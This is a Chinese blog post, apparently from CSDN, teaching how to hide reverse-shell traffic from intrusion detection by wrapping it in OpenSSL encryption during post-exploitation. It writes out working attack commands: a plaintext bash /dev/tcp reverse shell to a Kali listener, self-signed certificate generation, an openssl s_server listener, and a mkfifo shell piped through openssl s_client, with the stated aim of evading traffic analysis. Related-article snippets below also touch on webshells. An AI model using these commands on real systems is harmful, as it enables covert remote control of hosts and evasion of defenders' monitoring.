利用OpenSSL加密反弹shell流量

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量3.2k 收藏 3
点赞数 2
文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/122947207
版权

简介

在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。

实验环境

kali:192.168.95.128

centos:192.168.95.147

Wireshark抓包

在kali上使用nc监听一个端口

nc -lvvp 4444

将centos的shell反弹过去

bash -i >& /dev/tcp/192.168.95.128/4444 0>&1

使用wireshark抓取流量包,反弹回来shell后执行一些命令

可以右键追踪tcp流查看到详细信息

使用wireshark抓包直接看到输入的命令和返回信息

OpenSSL反弹加密shell

OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。

在服务端使用openssl命令生成一个自签名证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

证书信息可以输入可以不输入

在服务端使用openssl命令监听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

在客户端目标主机上使用命令执行反弹

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quite -connect 192.168.95.128:4444>/tmp/s;rm /tmp/s

使用wireshark抓取流量包,收到反弹回来的shell后执行一些命令

再查看wireshark抓取到的流量包,已经进行了加密

服务端和客户端在使用 TLSv1.2 协议进行加密通信。

结语

苦都吃了,如果还没长大,就吃亏了。

Cheng-Ling
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
webshell使用与流量分析(含数据包)
hackzkaq的博客
04-29 3966
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
流量加密技术
课嗨教育的专栏
09-09 1295
目录 一、使用 Openssl 反弹加密 shell ​ 二、MSF 流量加密躲避检测 一、使用 Openssl 反弹加密 shell 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往 需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件 会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回 溯分析,就可以复现攻击的过程。此时红队攻击就会暴漏出来,整个项目都要停 止。 使用 wireshark 抓包直接
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1391
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
利用OpenSSL搭建一个反弹shell
loon208的博客
04-01 596
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。 准备 首先我们需要在自己的机器上生成密钥,这里用kali来演示。 root@kali#...
Openssl反弹加密shell
干铮的博客
03-14 892
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
使用OpenSSL反弹shell
mirocky的博客
10-12 505
使用openssl进行反弹shell的过程
openssl命令_利用OpenSSL搭建一个反弹shell
weixin_39705069的博客
12-06 125
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。准备首先我们需要在自己的机器上生成密钥,这里用kali来演示。root@kali# openssl r...
thrift通过openssl加密证书实现双向通信
08-08
thrift框架通过vs2013编译好的静态库,然后通过vs2013实现双向通信代码,通信协议利用openssl加密证书的方式来实现,本资源给出了完整的实现代码,证书可以在网上百度一下,看看如何生成客户端和服务端的,然后编译...
易语言OpenSSL加密算法
07-21
易语言OpenSSL加密算法源码,OpenSSL加密算法,AES_CBC_encrypt,NoPadding,pkcs5padding,ISO10126Padding,Padding_dec,random,Base64Encoding,Base64Decrypt,AES_set_encrypt_key,AES_cbc_encrypt,AES_set_decrypt_key
PHP中OpenSSL加密问题整理
10-18
本篇文章主要给大家讲解了PHP中OpenSSL加密遇到的问题整理以及相关的处理办法,一起参考学习下。
VC++运用OpenSSL实现对文件加密.zip
03-08
OpenSSL是一个开源库,提供了丰富的安全协议和加密算法,广泛应用于网络通信、数据加密以及数字签名等领域。本项目"VC++运用OpenSSL实现对文件加密"是将这两者结合,用于保护敏感文件的安全。 首先,我们要了解...
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
openssl加密jar包web开发
10-29
直接导入openssl_tools包,即可使用。在生产环境中,有时会需要用到自签名的证书,而谷歌浏览器从2016年开始就降低了sha1的算法级别,openssl默认使用的是sha1的算法。 bio = BIO_new_connect("hostname:port"); if...
红队隧道加密OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 983
OpenSSL是一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
网络安全进阶篇之流量加密(十三章-1)使用 Openssl 反弹加密 shell
划水的小白白
05-19 869
文章目录零、什么是OpenSSL?一、为什么要进行流量加密二、抓取流量包三、对数据进行加密 零、什么是OpenSSL? 在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。 一、为什么要进行流量加密 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻
openssl命令_使用OpenSsl加密反弹shell
weixin_39713538的博客
11-24 334
一、实际环境:当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shellOpenSSL ...
linux反弹shell特征提取
SHELLCODE_8BIT的博客
04-09 1980
1.标准输入0的pipe被转到其他进程,也就是只需要匹配bash的0既然,不需要12也匹配,这样减少性能消耗。这种没有回显,但是可以执行命令。pipe和爷进程交互。
linux 远程执行本地shell_流量检测如何实锤远程代码执行反弹shell成功
weixin_39590453的博客
11-23 409
通常在渗透中挖掘到了远程代码执行漏洞,攻击者会利用漏洞执行操作系统命令获得系统相关信息,也可写入webshel或者是直接反弹shell到攻击者监听的服务器。上述的攻击行为也都是有特征可以做检测的,但是仅仅依据特征检测通常只能检测到探测攻击,每台流量检测设备每天的探测日志是海量的,安全运营人员很难从中获得价值信息。如果通过引擎关联上反弹shell特征以及成功以后的后续动作即可去判断攻击成...
反弹shell
chenkaifang的博客
07-14 235
参考链接: https://xz.aliyun.com/t/2549 1、介绍 reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接...
openssl加密后的shell脚本还能执行吗
07-10
是的,经过 OpenSSL 加密shell 脚本仍然可以执行。OpenSSL加密功能是针对文件进行加密,而不是针对脚本本身的执行。当你使用 OpenSSL 加密一个 shell 脚本后,脚本会变成加密的二进制文件你可以使用 OpenSSL 解密该文件,后再执行解密后的脚本。请记住,解密后的脚本可能需要适当的权限才能被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值